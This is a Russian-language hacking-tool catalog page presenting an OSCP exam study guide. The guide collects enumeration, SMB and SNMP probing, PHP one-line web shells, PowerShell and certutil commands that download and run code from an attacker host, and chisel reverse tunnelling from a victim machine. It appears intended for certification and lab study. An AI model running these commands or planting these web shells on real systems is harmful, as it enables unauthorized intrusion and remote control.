Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
OSCP — OSCP Study Guide | Kitploit
Инструменты/GitHubGitHub/rootsecdev/oscp
РазведкаЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияВеб-безопасностьСетевая безопасностьТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubrootsecdev/oscp

OSCP

OSCP Study Guide

425103 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

OSCP

Руководство по подготовке к OSCP

Содержание

Энумерация и разведка

Веб-энумерация

Сканирование Nikto:

root@kitploit:~
nikto -h http://10.10.10.1

Подбор директорий с помощью различных инструментов:

DIRB

root@kitploit:~
dirb http://10.10.10.1

Gobuster

root@kitploit:~
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx

Пентест веб-приложений

XSS-пейлоады: Шпаргалка: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

Базовое тестирование XSS-форм с помощью слушателя netcat или веб-сервера на Python

root@kitploit:~

Межсайтовый скриптинг для дампа cookie в base64. Убедитесь, что вы выполнили URL-кодирование в Burp с помощью ctrl + u

root@kitploit:~

Веб-шеллы

Ссылка: https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html

Простой PHP-веб-шелл для выполнения команд

root@kitploit:~
<?php system($_REQUEST ['cmd']) ?>
root@kitploit:~
<?php system($_GET['cmd']); ?>

Пентест SNMP

Порт 161 UDP

root@kitploit:~
snmpwalk -c public -v2c 10.129.213.210
root@kitploit:~
snmp-check 10.129.213.210

Пентест SMB

root@kitploit:~
crackmapexec smb 10.129.70.254 

Обнаружение открытых анонимных общих ресурсов

root@kitploit:~
smbclient -L //10.129.70.254

Null-аутентификация

root@kitploit:~
smbclient -N -L //10.129.70.254

Пост-эксплуатация

Скачивание и передача файлов

Certutil:

root@kitploit:~
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

PowerShell:

root@kitploit:~
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
root@kitploit:~
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"

Проброс портов и туннелирование

Использование Chisel:

Пример проброса портов: порт 910 становится доступным на Kali-машине

root@kitploit:~
on victim machine setup port forwarding
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
root@kitploit:~
On Kali attack box setup a reverse listner for port forward with chisel
./chisel server --port 5555 --reverse
Скачать инструмент